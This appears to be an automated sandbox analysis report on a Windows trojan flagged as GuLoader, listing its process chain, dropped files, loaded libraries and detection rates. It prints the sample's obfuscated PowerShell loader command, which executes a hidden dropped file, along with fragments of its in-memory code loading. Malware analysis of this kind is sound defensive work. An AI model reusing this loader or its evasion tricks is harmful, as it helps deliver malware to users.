Windows Analysis Report
yMXFgPOdf2.exe

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_00406547	0_2_00406547
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_00406D1E	0_2_00406D1E
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_004049C7	0_2_004049C7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_077F24C0	2_2_077F24C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_077F7738	2_2_077F7738
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_077FABF8	2_2_077FABF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_077F76E8	2_2_077F76E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_077FDE8B	2_2_077FDE8B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0797C496	2_2_0797C496

Source: yMXFgPOdf2.exe, 00000000.00000000.2061339112.000000000044F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe
Source: yMXFgPOdf2.exe	Binary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe
Source: yMXFgPOdf2.exe.2.dr	Binary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe

Source: yMXFgPOdf2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal96.troj.evad.winEXE@6/12@2/2

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_00404481 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404481

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File created: C:\Users\user\AppData\Roaming\postarmistice

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2956:120:WilError_03

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File created: C:\Users\user\AppData\Local\Temp\nss5720.tmp

Source: yMXFgPOdf2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: yMXFgPOdf2.exe	ReversingLabs: Detection: 73%
Source: yMXFgPOdf2.exe	Virustotal: Detection: 66%

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File read: C:\Users\user\Desktop\yMXFgPOdf2.exe

Source: unknown	Process created: C:\Users\user\Desktop\yMXFgPOdf2.exe "C:\Users\user\Desktop\yMXFgPOdf2.exe"
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Found suspicious powershell code related to unpacking or dynamic code loading

Source:	Binary string: \System.Core.pdbEp' source: powershell.exe, 00000002.00000002.2646587855.0000000007794000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdbEp. source: powershell.exe, 00000002.00000002.2646587855.0000000007794000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbb#M# source: powershell.exe, 00000002.00000002.2632775743.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.2654376691.000000000ABA2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3919921584.0000000005692000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Zoologists $Kokkererer91 $Basishavnen), (Lrredskjole @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Majesticalness = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pseudoanthropological)), $flintglas).DefineDynamicModule($Indexers, $false).DefineType($Ventripotent, $Pinstripe, [System.MulticastDel

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040610B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_077F1359 push eax; mov dword ptr [esp], edx	2_2_077F136C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0797B04B push dword ptr [ebp+ebx-75h]; iretd	2_2_0797B051
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07970FC4 push es; iretd	2_2_07970FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_096F39C1 push 8BD38B50h; iretd	2_2_096F39C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_096F3E69 push 8BD68B50h; retf	2_2_096F3E6E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
